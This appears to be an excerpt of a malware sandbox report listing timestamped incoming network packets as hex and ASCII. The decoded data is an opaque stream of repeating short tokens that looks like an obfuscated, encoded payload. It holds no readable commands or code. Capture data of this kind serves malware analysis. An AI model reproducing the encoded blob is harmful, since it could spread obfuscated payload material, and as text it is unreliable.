Oxk OOK Yx Kk Yx t kK OOK OOt Ko OOE Yx Kk tK YY kK OOK Oot OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yo Kk Yx YK Ko OOY OOt OxQ oKK YO Kk Yx YE kK OOK OOt Qk OOo Yx
2021-10-29 18:50:16 UTC	1674	IN	Data Raw: 4f 4f 6f 20 59 78 20 59 4b 20 51 45 20 4f 45 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 52 51 20 4b 51 20 59 78 20 4b 6b 20 59 52 20 6b 51 20 51 6b 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 51 74 20 59 6f 20 59 52 20 45 59 20 59 78 20 74 6b 20 6f 59 59 20 4b 74 20 4f 78 51 20 4f 4f 6f 20 59 4f 20 6f 4f 20 6f 6f 52 20 6f 78 6b 20 6b 4b 20 4f 4f 4b 20 4f 4f 45 20 52 51 20 74 4f 20 59 78 20 4b 6b 20 59 52 20 52 51 20 4f 78 6b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 45 4f 20 4f 59 6b 20 4b 6b 20 59 78 20 4b 6b 20 59 51 20 74 45 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 51 45 20 6b 20 59 4f 20 59 4b 20 6b 6f 20 51 51 20 4f 4f 59 20 4f 78 4f 20 51 74 20 59 4b 20 4b 45 20 4f 51 4f 20 4f 78 6b 20 6b 4b 20 4f 4f 4b 20 4f 4f 52 20 74 6f 20 4f 52 78 20 4f 45 4b 20 4b 6b 20 59 78 Data Ascii: OOo Yx YK QE OE kK OOK Oot RQ KQ Yx Kk YR kQ Qk OOY OOt Oxt Qt Yo YR EY Yx tk oYY Kt OxQ OOo YO oO ooR oxk kK OOK OOE RQ tO Yx Kk YR RQ Oxk OOK OOt OxE EO OYk Kk Yx Kk YQ tE OOt OxQ Ooo QE k YO YK ko QQ OOY OxO Qt YK KE OQO Oxk kK OOK OOR to ORx OEK Kk Yx
2021-10-29 18:50:16 UTC	1676	IN	Data Raw: 6f 4b 6b 20 59 59 20 4f 4f 6f 20 59 78 20 4b 51 20 6f 45 20 45 6f 20 74 59 20 4b 52 20 6f 45 6f 20 4f 6f 6f 20 45 4f 20 6b 59 20 4b 6b 20 59 78 20 52 78 20 51 59 20 4f 4f 74 20 4f 78 51 20 6f 4b 74 20 4f 4f 78 20 4f 51 4f 20 4f 78 52 20 59 78 20 59 4b 20 6b 59 20 6b 74 20 4f 52 59 20 6f 4b 45 20 4f 4f 6f 20 59 78 20 59 6f 20 6f 52 20 4f 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 45 78 20 74 6f 20 59 78 20 4b 6b 20 59 52 20 45 78 20 51 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 51 6f 20 59 6f 20 59 59 20 45 74 20 4f 74 6f 20 51 4b 20 6b 51 20 4f 4f 45 20 4f 78 52 20 4f 78 6f 20 4f 52 6b 20 59 6b 20 6f 45 52 20 59 45 20 4f 4f 4b 20 4f 74 6f 20 4f 4f 74 20 4f 78 74 20 51 78 20 59 78 20 4b 51 20 45 4b 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 74 20 4f 4f 6f 20 Data Ascii: oKk YY OOo Yx KQ oE Eo tY KR oEo Ooo EO kY Kk Yx Rx QY OOt OxQ oKt OOx OQO OxR Yx YK kY kt ORY oKE OOo Yx Yo oR O kK OOK Oot Ex to Yx Kk YR Ex Q OOK OOt OxE Qo Yo YY Et Oto QK kQ OOE OxR Oxo ORk Yk oER YE OOK Oto OOt Oxt Qx Yx KQ EK YK kK OOK OOt Oxt OOo
2021-10-29 18:50:16 UTC	1677	IN	Data Raw: 78 20 4b 6b 20 59 52 20 52 6b 20 4b 51 20 4f 4f 45 20 4f 4f 74 20 6f 51 20 4f 4b 20 4b 4b 20 4b 6b 20 59 78 20 52 78 20 4f 6f 4b 20 4f 78 51 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 51 45 20 51 6f 20 59 78 20 59 4b 20 51 4b 20 6f 51 20 4b 45 20 4f 78 51 20 4f 4f 6f 20 59 52 20 45 59 20 59 74 20 45 51 20 51 4b 20 51 78 20 74 45 20 4f 78 51 20 4f 4f 6f 20 59 52 20 6f 51 20 51 6f 20 45 51 20 51 59 20 51 78 20 74 45 20 4f 78 51 20 4f 4f 6f 20 59 52 20 6f 51 20 6b 74 20 45 78 20 59 6f 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 51 74 20 59 52 20 6f 4b 20 4f 6f 4f 20 59 4b 20 6b 4b 20 4f 6f 78 20 6f 52 20 4f 6f 20 4f 4f 6f 20 59 78 20 59 6b 20 45 45 20 59 6b 20 4f 6f 4b 20 4f 6b 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 45 59 20 59 51 20 6f 52 20 4f 6f 59 20 6b 4b 20 4f Data Ascii: x Kk YR Rk KQ OOE OOt oQ OK KK Kk Yx Rx OoK OxQ OOt OxQ Ooo QE Qo Yx YK QK oQ KE OxQ OOo YR EY Yt EQ QK Qx tE OxQ OOo YR oQ Qo EQ QY Qx tE OxQ OOo YR oQ kt Ex Yo OOK OOt OxE Qt YR oK OoO YK kK Oox oR Oo OOo Yx Yk EE Yk OoK Ok OOt OxQ Ooo EY YQ oR OoY kK O
2021-10-29 18:50:16 UTC	1678	IN	Data Raw: 20 4f 4b 4f 20 4f 4f 4b 20 4f 4f 74 20 4f 78 74 20 6b 6b 20 59 52 20 4b 6b 20 59 78 20 6f 51 20 6b 74 20 4f 4f 6b 20 6f 52 20 4f 45 45 20 4f 4f 45 20 59 78 20 59 4b 20 6f 4b 20 59 4b 20 74 4f 20 52 52 20 4f 6f 52 20 4f 78 51 20 51 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 4f 4f 20 6b 6b 20 45 51 20 4b 6b 20 59 78 20 4b 6b 20 45 6b 20 4b 59 20 4f 4f 45 20 4f 78 51 20 78 20 6f 52 20 6f 45 45 20 59 78 20 59 4b 20 6b 6f 20 51 78 20 4f 6f 52 20 4f 78 51 20 4f 4f 6f 20 6f 59 20 59 4f 20 59 4b 20 59 4f 20 51 78 20 4f 4f 6b 20 4f 6f 45 20 4f 78 4b 20 4f 6f 52 20 59 6f 20 52 6f 20 59 45 20 59 52 20 51 6f 20 4f 6f 4b 20 4f 6f 4b 20 51 51 20 4f 6f 6f 20 51 45 20 6f 78 4b 20 59 4f 20 59 4b 20 6b 6f 20 6b 6b 20 74 20 4f 4f 4f 20 6b Data Ascii: OKO OOK OOt Oxt kk YR Kk Yx oQ kt OOk oR OEE OOE Yx YK oK YK tO RR OoR OxQ Qo Yx Kk Yx YK kK OOK OOt OOO kk EQ Kk Yx Kk Ek KY OOE OxQ x oR oEE Yx YK ko Qx OoR OxQ OOo oY YO YK YO Qx OOk OoE OxK OoR Yo Ro YE YR Qo OoK OoK QQ Ooo QE oxK YO YK ko kk t OOO k
2021-10-29 18:50:16 UTC	1680	IN	Data Raw: 51 6b 20 4b 4b 20 4f 78 4f 20 4f 78 6f 20 4b 59 20 45 6f 20 6f 52 20 6b 51 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 78 52 20 4f 78 6f 20 59 51 20 45 6b 20 59 45 20 4f 6b 4b 20 52 4f 20 4f 6f 6f 20 6f 59 4f 20 4b 20 4b 4f 20 6f 52 20 51 59 20 59 78 20 59 4b 20 51 4b 20 4f 20 4f 78 6f 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 59 4f 20 59 6f 20 45 4b 20 51 45 20 4f 6f 6f 20 6f 52 20 74 74 20 4f 4f 6f 20 59 78 20 59 4b 20 45 45 20 59 78 20 4f 45 6b 20 4f 4f 51 20 6b 45 20 4f 74 51 20 4f 4f 6f 20 45 6b 20 6f 52 20 45 59 20 59 78 20 4f 6f 52 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 51 52 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 74 4b 20 4f 4f 4b 20 4f 74 20 6f 45 51 20 4f 4f 6f 20 4b 51 20 52 45 20 59 78 20 59 4b 20 6b 59 20 4f 78 59 20 52 51 20 4f 78 6f 20 4f 4f 6f 20 6f Data Ascii: Qk KK OxO Oxo KY Eo oR kQ kK OOK Oot OxR Oxo YQ Ek YE OkK RO Ooo oYO K KO oR QY Yx YK QK O Oxo OxQ OOo Yo YO Yo EK QE Ooo oR tt OOo Yx YK EE Yx OEk OOQ kE OtQ OOo Ek oR EY Yx OoR OOK OOt Oxk QR Yx Kk Yx YK tK OOK Ot oEQ OOo KQ RE Yx YK kY OxY RQ Oxo OOo o
2021-10-29 18:50:16 UTC	1681	IN	Data Raw: 78 20 4b 6b 20 59 52 20 52 4f 20 6b 52 20 4f 4f 52 20 74 20 6f 4b 78 20 4f 4f 74 20 59 78 20 52 4b 20 59 45 20 4b 51 20 6f 4f 6b 20 6f 74 20 51 51 20 52 51 20 4f 78 74 20 59 78 20 4b 6b 20 59 6f 20 6f 52 20 6b 6f 20 4f 20 4b 20 4f 78 51 20 4f 4f 6f 20 59 52 20 74 4b 20 59 6f 20 6f 6b 20 74 4f 20 52 52 20 4f 6f 74 20 4f 78 51 20 6f 4b 4f 20 59 78 20 4b 6b 20 59 78 20 45 59 20 6b 4b 20 4f 4f 4b 20 4f 78 78 20 4f 4f 4f 20 4f 4f 59 20 52 4b 20 4f 45 59 20 59 59 20 59 4b 20 45 52 20 51 78 20 6b 4f 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 45 6b 20 6f 52 20 52 51 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 78 45 20 4f 4f 6b 20 6f 52 20 74 78 20 59 78 20 59 4b 20 51 4b 20 4f 6f 4f 20 4f 4f 51 20 4f 4f 51 20 6f 59 45 20 45 74 20 4b 6b 20 59 78 20 4b 59 20 4f 4f 45 20 4f 78 Data Ascii: x Kk YR RO kR OOR t oKx OOt Yx RK YE KQ oOk ot QQ RQ Oxt Yx Kk Yo oR ko O K OxQ OOo YR tK Yo ok tO RR Oot OxQ oKO Yx Kk Yx EY kK OOK Oxx OOO OOY RK OEY YY YK ER Qx kO OxQ OOo Yo Ek oR RQ kK OOK Oot OxE OOk oR tx Yx YK QK OoO OOQ OOQ oYE Et Kk Yx KY OOE Ox
2021-10-29 18:50:16 UTC	1682	IN	Data Raw: 20 4f 52 6f 20 4f 45 59 20 4f 78 51 20 4f 4f 6f 20 59 4b 20 6f 4b 20 59 20 59 4b 20 6b 4b 20 4f 6f 78 20 52 20 6b 59 20 4f 4f 6f 20 59 78 20 59 6b 20 6f 52 20 6b 6b 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 4f 4f 20 45 4f 20 52 52 20 4b 6b 20 59 78 20 52 78 20 6b 74 20 4f 4f 6b 20 51 45 20 74 4b 20 4f 4f 6f 20 59 78 20 59 4b 20 51 45 20 6b 74 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 74 4f 20 4f 4f 6f 20 59 78 20 4b 45 20 6f 20 59 45 20 6b 4b 20 4f 4f 4f 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 45 45 20 4b 6b 20 59 78 20 45 51 20 6b 52 20 51 4b 20 4f 4f 45 20 4f 4f 4f 20 6f 59 4b 20 45 4f 20 59 6f 20 45 6b 20 52 78 20 4f 45 6b 20 51 6b 20 4f 4f 51 20 4f 78 59 20 4f 4f 59 20 6f 52 20 74 4b 20 59 78 20 59 4b 20 51 4b 20 4f 6f 78 20 4f 74 4f 20 4f 78 4b 20 6b 52 20 45 Data Ascii: ORo OEY OxQ OOo YK oK Y YK kK Oox R kY OOo Yx Yk oR kk kK OOK Oot OOO EO RR Kk Yx Rx kt OOk QE tK OOo Yx YK QE kt kK OOK Oot tO OOo Yx KE o YE kK OOO OOt OxQ OOo EE Kk Yx EQ kR QK OOE OOO oYK EO Yo Ek Rx OEk Qk OOQ OxY OOY oR tK Yx YK QK Oox OtO OxK kR E
2021-10-29 18:50:16 UTC	1684	IN	Data Raw: 6f 20 4f 4f 6f 20 59 78 20 59 6b 20 51 45 20 4f 74 52 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 74 59 20 4f 4f 51 20 45 74 20 4f 78 4b 20 59 74 20 4b 51 20 6b 52 20 6f 51 20 6f 4b 4f 20 4f 78 51 20 4f 4f 6f 20 59 52 20 6f 20 6f 6f 74 20 4b 6b 20 59 51 20 6f 4b 59 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 6f 4b 20 6f 20 4b 6b 20 45 78 20 45 4f 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 6b 6b 20 45 78 20 4b 6b 20 59 78 20 4b 6b 20 4f 6f 52 20 52 4b 20 51 45 20 4f 45 20 4f 4f 6f 20 59 78 20 59 6b 20 4b 6b 20 6b 51 20 59 45 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 51 78 20 59 78 20 4b 6b 20 4b 4f 20 52 20 6b 52 20 4f 4f 4b 20 51 4b 20 4f 78 51 20 4f 4f 6f 20 59 78 20 59 4b 20 59 78 20 59 4b 20 52 51 20 4f 4f 6f 20 51 45 20 6b 4f 20 4f 4f 6f 20 59 78 20 59 6b 20 45 78 20 52 Data Ascii: o OOo Yx Yk QE OtR kK OOK Oot tY OOQ Et OxK Yt KQ kR oQ oKO OxQ OOo YR o oot Kk YQ oKY OOt OxQ Ooo oK o Kk Ex EO OOK OOt OxE kk Ex Kk Yx Kk OoR RK QE OE OOo Yx Yk Kk kQ YE OOK OOt OxE Qx Yx Kk KO R kR OOK QK OxQ OOo Yx YK Yx YK RQ OOo QE kO OOo Yx Yk Ex R
2021-10-29 18:50:16 UTC	1685	IN	Data Raw: 20 4f 4f 6b 20 52 4b 20 4b 6b 20 4b 6b 20 45 74 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 78 20 4f 78 51 20 4f 4f 6f 20 45 59 20 59 78 20 74 45 20 59 6f 20 6b 4b 20 4f 4f 4b 20 4f 4f 45 20 4f 4f 78 20 45 4f 20 59 4b 20 4b 51 20 59 78 20 4b 6b 20 52 74 20 4f 6f 78 20 4f 74 4f 20 4f 78 4b 20 6b 52 20 45 52 20 59 6b 20 6f 45 52 20 59 4b 20 6b 6f 20 6b 6b 20 4f 4f 74 20 4f 78 6b 20 51 52 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 78 4f 20 4f 6f 59 20 4f 4f 6f 20 59 59 20 52 45 20 59 78 20 59 4b 20 6b 59 20 4f 78 59 20 52 51 20 4f 4f 4f 20 4f 4f 6f 20 6f 78 20 4b 6b 20 59 78 20 59 4b 20 74 51 20 4f 4f 4b 20 4f 4f 74 20 4f 6f 4b 20 4f 4f 59 20 52 59 20 51 4f 20 59 4f 20 59 4b 20 6b 6f 20 45 59 20 4f 4f 6b 20 4f 4f 4f 20 4f 4f 20 4b 6b 20 4b 6b Data Ascii: OOk RK Kk Kk Et YK kK OOK OOx OxQ OOo EY Yx tE Yo kK OOK OOE OOx EO YK KQ Yx Kk Rt Oox OtO OxK kR ER Yk oER YK ko kk OOt Oxk QR Yx Kk Yx YK kK OOK OxO OoY OOo YY RE Yx YK kY OxY RQ OOO OOo ox Kk Yx YK tQ OOK OOt OoK OOY RY QO YO YK ko EY OOk OOO OO Kk Kk
2021-10-29 18:50:16 UTC	1686	IN	Data Raw: 6f 74 20 4f 74 51 20 4f 4f 74 20 6f 78 20 45 6b 20 59 52 20 6f 45 6f 20 6b 4b 20 4f 4f 52 20 51 59 20 4f 78 51 20 4f 4f 6f 20 59 4f 20 45 6f 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 6f 74 20 52 4f 20 4b 6b 20 59 59 20 59 74 20 6b 4b 20 4f 4f 4b 20 4f 4f 52 20 4f 4f 6b 20 52 4b 20 4b 6b 20 4b 6b 20 45 52 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 78 59 20 4f 78 51 20 4f 4f 6f 20 45 59 20 59 78 20 74 45 20 59 6f 20 6b 4b 20 4f 4f 4b 20 4f 4f 45 20 4f 4f 78 20 45 4f 20 52 45 20 4b 51 20 59 78 20 4b 6b 20 51 4b 20 4f 74 6f 20 4f 4f 6f 20 74 59 20 4f 78 6f 20 59 52 20 6f 45 6b 20 59 78 20 4b 6b 20 4f 6f 52 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 51 52 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 6f 6f 20 51 6b 20 4f 4f 6f Data Ascii: ot OtQ OOt ox Ek YR oEo kK OOR QY OxQ OOo YO Eo Yx YK kK OOK OOt OxQ Oot RO Kk YY Yt kK OOK OOR OOk RK Kk Kk ER YK kK OOK OxY OxQ OOo EY Yx tE Yo kK OOK OOE OOx EO RE KQ Yx Kk QK Oto OOo tY Oxo YR oEk Yx Kk OoR OOK OOt Oxk QR Yx Kk Yx YK kK OOK Ooo Qk OOo
2021-10-29 18:50:16 UTC	1688	IN	Data Raw: 4f 4f 6f 20 4f 4b 20 4f 4f 4f 20 4f 4f 6f 20 59 78 20 59 6f 20 4b 51 20 6b 51 20 51 4b 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 4f 6f 6f 20 6f 45 52 20 59 45 20 6f 78 20 45 6f 20 51 4b 20 4f 74 6f 20 4f 4f 74 20 4f 78 74 20 51 78 20 59 78 20 4b 6b 20 59 4f 20 45 6b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 52 45 20 52 4f 20 59 4b 20 6b 4f 20 4f 6f 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 45 20 4b 4f 20 78 20 4b 6b 20 59 4b 20 52 52 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 78 6b 20 59 78 20 4b 6b 20 45 59 20 59 6f 20 4b 74 20 4f 4f 6f 20 4f 4f 74 20 4f 78 51 20 4f 4f 52 20 4b 51 20 51 59 20 45 6b 20 59 59 20 6b 4b 20 4f 4f 52 20 4f 6f 74 20 4f 74 51 20 4f 4f 74 20 6f 78 20 45 6b 20 59 52 20 6f 45 6f 20 6b 4b 20 4f 4f 52 20 51 59 20 4f Data Ascii: OOo OK OOO OOo Yx Yo KQ kQ QK OOY OOt Oxt Ooo oER YE ox Eo QK Oto OOt Oxt Qx Yx Kk YO Ek kK OOK OOt OxQ OOo Yx RE RO YK kO OoY OOt OxQ OOE KO x Kk YK RR OOK OOt OxQ Oxk Yx Kk EY Yo Kt OOo OOt OxQ OOR KQ QY Ek YY kK OOR Oot OtQ OOt ox Ek YR oEo kK OOR QY O
2021-10-29 18:50:16 UTC	1689	IN	Data Raw: 20 59 78 20 59 4b 20 52 51 20 51 51 20 4f 4f 74 20 4f 78 4b 20 4f 6f 74 20 59 78 20 4b 6b 20 59 4f 20 4f 6f 20 6b 52 20 4f 78 4f 20 6f 52 20 45 52 20 4f 4f 6f 20 59 78 20 59 4b 20 4b 6b 20 45 78 20 4f 51 59 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 51 78 20 59 78 20 45 59 20 6f 20 59 6f 20 6b 4b 20 59 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 74 20 51 4b 20 4b 51 20 4f 4f 4f 20 4f 4f 20 4b 6b 20 4b 6b 20 59 78 20 59 78 20 4f 6f 78 20 74 6b 20 4f 4f 51 20 6f 6f 20 4f 4f 4b 20 59 78 20 4b 6b 20 59 4b 20 52 74 20 6f 4f 59 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 6b 59 20 45 4f 20 59 4f 20 6f 78 20 6f 51 20 6b 4f 20 6f 51 20 6f 45 74 20 4f 78 51 20 4f 4f 6f 20 59 52 20 59 78 20 74 45 20 59 6f 20 6b 4b 20 4f 4f 4b 20 4f 4f 45 Data Ascii: Yx YK RQ QQ OOt OxK Oot Yx Kk YO Oo kR OxO oR ER OOo Yx YK Kk Ex OQY OOK OOt OxE Qx Yx EY o Yo kK Yk OOt OxQ OOo Yx Kk Yx YK kt QK KQ OOO OO Kk Kk Yx Yx Oox tk OOQ oo OOK Yx Kk YK Rt oOY OOK OOt Oxk kY EO YO ox oQ kO oQ oEt OxQ OOo YR Yx tE Yo kK OOK OOE
2021-10-29 18:50:16 UTC	1690	IN	Data Raw: 6b 6f 20 51 4b 20 4f 59 52 20 4f 78 78 20 51 51 20 59 59 20 45 4b 20 59 59 20 52 51 20 6f 4f 52 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 6b 6b 20 4f 4b 45 20 4b 51 20 59 78 20 4b 6b 20 74 78 20 4f 4f 51 20 51 74 20 52 51 20 4f 6b 45 20 59 4f 20 4b 6b 20 59 6f 20 52 51 20 4f 51 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 51 51 20 59 6f 20 45 4b 20 59 59 20 52 6b 20 4f 6b 6f 20 4f 4f 74 20 4f 4f 74 20 6f 51 20 6b 6b 20 4f 4b 4f 20 4b 51 20 59 78 20 4b 6b 20 4f 6f 74 20 4f 78 52 20 4f 4f 59 20 6f 20 52 4b 20 59 78 20 4b 6b 20 59 6f 20 6f 74 20 6b 6f 20 4f 20 6f 4f 45 20 4f 78 51 20 4f 4f 6f 20 59 52 20 74 4b 20 4f 6b 20 6f 6f 6f 20 6b 74 20 4f 4f 4b 20 4f 4f 74 20 52 51 20 6f 45 51 20 59 78 20 4b 6b 20 59 52 20 4b 6b 20 52 51 20 4f 4f 51 20 4f 78 45 20 4f 78 74 Data Ascii: ko QK OYR Oxx QQ YY EK YY RQ oOR OOY OOt Oxt kk OKE KQ Yx Kk tx OOQ Qt RQ OkE YO Kk Yo RQ OQK OOK OOt OxE QQ Yo EK YY Rk Oko OOt OOt oQ kk OKO KQ Yx Kk Oot OxR OOY o RK Yx Kk Yo ot ko O oOE OxQ OOo YR tK Ok ooo kt OOK OOt RQ oEQ Yx Kk YR Kk RQ OOQ OxE Oxt
2021-10-29 18:50:16 UTC	1692	IN	Data Raw: 20 59 6f 20 4f 4b 52 20 6f 45 20 4b 74 20 52 4b 20 4f 4b 78 20 4f 4f 59 20 59 4b 20 4f 4f 6f 20 59 78 20 59 4b 20 52 59 20 4f 6b 45 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 6f 78 74 20 6b 59 20 4b 78 20 45 52 20 6f 78 4b 20 4b 6b 20 6b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 74 20 45 20 4f 74 51 20 4b 6b 20 59 78 20 4b 6b 20 6f 4b 52 20 6b 74 20 4f 4f 78 20 4f 6f 4f 20 4f 4b 6f 20 59 6f 20 4f 78 51 20 59 78 20 59 4b 20 6b 6f 20 4f 20 6f 4b 4b 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 4f 4b 52 20 6f 45 20 4b 6f 20 52 4b 20 4f 4b 78 20 4f 4f 59 20 59 78 20 4f 4f 6f 20 59 78 20 59 4b 20 52 59 20 4f 6b 45 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 6f 78 74 20 6b 59 20 4b 74 20 45 52 20 6f 78 4b 20 4b 6b 20 59 6f 20 4f 4f 4b 20 4f 4f 74 20 4f 78 74 20 45 20 4f 74 51 20 4b 6b 20 59 78 Data Ascii: Yo OKR oE Kt RK OKx OOY YK OOo Yx YK RY OkE kK OOK OOY oxt kY Kx ER oxK Kk k OOK OOt Oxt E OtQ Kk Yx Kk oKR kt OOx OoO OKo Yo OxQ Yx YK ko O oKK OxQ OOo Yo OKR oE Ko RK OKx OOY Yx OOo Yx YK RY OkE kK OOK OOY oxt kY Kt ER oxK Kk Yo OOK OOt Oxt E OtQ Kk Yx
2021-10-29 18:50:16 UTC	1693	IN	Data Raw: 20 4b 6b 20 4f 4f 45 20 4f 20 6f 4f 78 20 4f 78 51 20 4f 4f 6f 20 59 52 20 51 59 20 51 45 20 59 59 20 6b 4b 20 4f 4f 52 20 6b 78 20 45 78 20 4f 78 59 20 59 78 20 4b 6b 20 59 52 20 6b 51 20 45 59 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 6b 59 20 52 59 20 52 20 59 78 20 59 4b 20 51 4b 20 6f 51 20 4f 6f 20 4f 78 6b 20 4f 4f 6f 20 59 6f 20 6f 4f 20 52 59 20 4f 59 6b 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 6f 20 6f 59 4f 20 59 4f 20 4b 6b 20 59 6f 20 4f 51 20 45 51 20 6f 4f 6b 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 51 45 20 74 51 20 59 4f 20 59 4b 20 6b 6f 20 6b 74 20 52 20 4f 51 52 20 4f 4f 6f 20 59 78 20 59 6b 20 51 45 20 74 74 20 6b 59 20 4f 4f 4b 20 4f 4f 59 20 74 6f 20 45 20 4f 59 4b 20 4b 6b 20 59 78 20 52 78 20 59 51 20 6f 59 4f 20 4f 4f 52 20 4f 78 51 20 4f Data Ascii: Kk OOE O oOx OxQ OOo YR QY QE YY kK OOR kx Ex OxY Yx Kk YR kQ EY OOY OOt Oxt kY RY R Yx YK QK oQ Oo Oxk OOo Yo oO RY OYk kK OOK Oot o oYO YO Kk Yo OQ EQ oOk OOt OxQ Ooo QE tQ YO YK ko kt R OQR OOo Yx Yk QE tt kY OOK OOY to E OYK Kk Yx Rx YQ oYO OOR OxQ O
2021-10-29 18:50:16 UTC	1694	IN	Data Raw: 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 4f 4f 59 20 4b 51 20 59 78 20 59 4b 20 6f 6f 20 4f 4f 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 74 20 59 78 20 4b 6b 20 59 78 20 59 74 20 6b 4b 20 4f 4f 4b 20 4f 4f 52 20 4f 4f 6b 20 52 4b 20 4b 51 20 4b 6b 20 6b 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 6b 59 20 4f 78 51 20 4f 4f 6f 20 45 59 20 4b 74 20 4b 52 20 45 78 20 52 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 6f 20 74 4b 20 59 52 20 59 78 20 74 78 20 4f 6f 4b 20 74 59 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 59 52 20 59 4b 20 6f 52 20 4f 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 52 59 20 74 78 20 59 6f 20 52 74 20 6b 52 20 59 4b 20 6b 4b 20 4f 6f 78 20 51 45 20 4f 51 6f 20 4f 4f 6f 20 59 78 20 59 6b 20 6f 52 20 4f 4f 52 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f Data Ascii: kK OOK OOt OxQ OOo OOY KQ Yx YK oo OOY OOt OxQ OOt Yx Kk Yx Yt kK OOK OOR OOk RK KQ Kk kx YK kK OOK kY OxQ OOo EY Kt KR Ex R OOK OOt OxE o tK YR Yx tx OoK tY OOt OxQ Ooo YR YK oR OYK kK OOK Oot RY tx Yo Rt kR YK kK Oox QE OQo OOo Yx Yk oR OOR kK OOK Oot O
2021-10-29 18:50:16 UTC	1696	IN	Data Raw: 74 20 4f 78 51 20 4f 4f 4b 20 6f 52 20 4f 45 52 20 59 78 20 59 4b 20 51 4b 20 51 78 20 6f 78 4b 20 4f 78 51 20 4f 4f 6f 20 59 52 20 6f 4b 20 4f 45 52 20 59 4b 20 6b 4b 20 4f 6f 78 20 6f 4b 59 20 4f 78 52 20 4f 4f 45 20 59 78 20 59 6f 20 74 52 20 4b 51 20 6b 59 20 4f 4f 4b 20 4f 4f 45 20 6f 6f 20 6f 78 45 20 59 78 20 4b 6b 20 59 52 20 74 6f 20 6b 45 20 4f 4f 59 20 4f 4f 74 20 4f 78 59 20 4f 4b 20 59 6f 20 4b 51 20 59 78 20 59 78 20 4f 6f 4f 20 52 52 20 51 51 20 45 4f 20 6f 45 78 20 59 6b 20 4b 6b 20 52 52 20 45 4b 20 4f 45 6f 20 4f 6f 52 20 4f 4f 74 20 4f 78 51 20 4f 4f 4b 20 6f 52 20 4f 45 52 20 59 78 20 59 4b 20 51 4b 20 4f 78 4f 20 6f 4b 6b 20 6f 6f 4b 20 4f 4f 6f 20 59 78 20 4b 51 20 6f 45 20 45 6f 20 52 52 20 4f 78 6f 20 51 45 20 6f 78 51 20 4f 4f 6f Data Ascii: t OxQ OOK oR OER Yx YK QK Qx oxK OxQ OOo YR oK OER YK kK Oox oKY OxR OOE Yx Yo tR KQ kY OOK OOE oo oxE Yx Kk YR to kE OOY OOt OxY OK Yo KQ Yx Yx OoO RR QQ EO oEx Yk Kk RR EK OEo OoR OOt OxQ OOK oR OER Yx YK QK OxO oKk ooK OOo Yx KQ oE Eo RR Oxo QE oxQ OOo
